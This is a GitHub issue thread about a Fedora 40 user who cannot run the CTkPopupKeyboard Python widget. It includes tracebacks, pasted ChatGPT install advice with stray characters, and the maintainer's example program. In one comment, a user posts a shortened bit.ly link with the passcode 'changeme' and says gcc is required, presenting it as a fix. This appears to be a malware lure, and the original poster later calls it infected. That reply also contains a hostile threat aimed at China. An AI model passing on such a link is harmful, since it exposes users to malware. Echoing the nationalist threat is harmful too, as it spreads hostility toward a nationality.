### ISSUE TITLE
fedora 40 OS'te ModuleNotFoundError

### ISSUE THREAD

**Issue by universish** [Akascape/CTkPopupKeyboard#2]
xxxxx@yyyyyy:~/İndirilenler/CTkPopupKeyboard-main/CTkPopupKeyboard$ python3 keyboard.py 
/home/mxxxx/İndirilenler/CTkPopupKeyboard-main/CTkPopupKeyboard/keyboard.py:89: SyntaxWarning: invalid escape sequence '\ '
  'row2' : ['Tab','q', 'w', 'e', 'r', 't', 'y', 'u', 'i', 'o', 'p','\ '],
Traceback (most recent call last):
  File "/home/mxxxx/İndirilenler/CTkPopupKeyboard-main/CTkPopupKeyboard/keyboard.py", line 7, in <module>
    from customtkinter import *
ModuleNotFoundError: No module named 'customtkinter'

**Comment by universish** [comment]
with the help of chatgpt:

According to the error message, the Python code contains a SyntaxWarning and ModuleNotFoundError. Let's go step by step to solve these errors:

1. Fix Escape Sequence Warning
The first warning is: invalid escape sequence '\ '.

This means that Python recognizes the backslash (\) character as an escape sequence. So instead of '\', you should use two backslashes (\\) to type a full backslash. So this line:

python
copy code
'row2' : ['Tab','Q', 'W', 'E', ​​'R', 'T', 'Y', 'U', 'I', 'O', 'P',' \'],
you should update like this:

python
copy code
'row2' : ['Tab','Q', 'W', 'E', ​​'R', 'T', 'Y', 'U', 'I', 'O', 'P',' \\ '],

2. Installing 'customtkinter' Module
ModuleNotFoundError: No module named 'customtkinter' error indicates that the required customtkinter library is not installed on your system. To install it, you can follow these steps:

a) pip Installation:
If you don't have pip (Python package manager) installed, install it first:

bash
copy code
sudo dnf install python3-pip
b) customtkinter Installation:
Next, install the customtkinter module:

bash
copy code
pip3 install customtkinter

Now it didn't work. But I didn't get any error message.

**Comment by tinsn** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by universish** [comment]
xxxxx@yyyyyy:~/İndirilenler/CTkPopupKeyboard-main/CTkPopupKeyboard$ python3 keyboard.py

xxxxx@yyyyyy:~/İndirilenler/CTkPopupKeyboard-main/CTkPopupKeyboard$ python3 numpad.py

not working

**Comment by universish** [comment]
> Şuna bir şans ver [https://bit.ly/4eaAnWN ](https://bit.ly/4eaAnWN) Şifre: beni değiştir bir gcc derleyiciniz olmalı

Are you a soldier of the Chinese government's virtual army? why are you sending infected files? get your hands off open source and free software. or we will wipe China off the internet

**Comment by Akascape** [comment]
@universish If you have properly installed the modules, now make an example .py porgram keeping the CTkPopupKeyboard folder in the same location.

Example Program:
```python
from CTkPopupKeyboard import PopupKeyboard, PopupNumpad
import customtkinter

def show_popup():
    # Disable/Enable popup
    if switch.get()==1:
        keyboard.disable = False
        numpad.disable = False
    else:
        keyboard.disable = True
        numpad.disable = True
        
root = customtkinter.CTk()

text_box = customtkinter.CTkTextbox(root)
text_box.pack(fill="both", padx=10, pady=10)

# attach popup keyboard to text_box
keyboard = PopupKeyboard(text_box)

entry = customtkinter.CTkEntry(root, placeholder_text="Write Something...")
entry.pack(fill="both", padx=10, pady=10)

# attach popup keyboard to entry
numpad = PopupNumpad(entry)

switch = customtkinter.CTkSwitch(root, text="On-Screen Keyboard", command=show_popup)
switch.pack(pady=10)
switch.toggle()

root.mainloop()
```
Please follow the documentation properly.

**Comment by universish** [comment]
xxxxx@yyyyyy:~/İndirilenler$ python3 example.py 
Traceback (most recent call last):
  File "/home/macellan/İndirilenler/example.py", line 1, in <module>
    from CTkPopupKeyboard import PopupKeyboard, PopupNumpad
ModuleNotFoundError: No module named 'CTkPopupKeyboard'
xxxxx@yyyyyy:~/İndirilenler$ ls CTkPopupKeyboard-main
CTkPopupKeyboard  LICENSE  README.md

**Comment by universish** [comment]
sorry.:

xxxxx@yyyyyy:~/İndirilenler$ ls CTkPopupKeyboard-main
CTkPopupKeyboard  LICENSE  README.md

xxxxx@yyyyyy:~/İndirilenler$ cd CTkPopupKeyboard-main/

xxxxx@yyyyyy:~/İndirilenler/CTkPopupKeyboard-main$ python3 example.py 

![Ekran Görüntüsü - 2024-09-05 19-23-36](https://github.com/user-attachments/assets/7d37779f-8e10-41b4-9884-66c05dbb7c60)

**Comment by Akascape** [comment]
@universish You have to double click on the textbox widget of that program to open the popup keyboard.
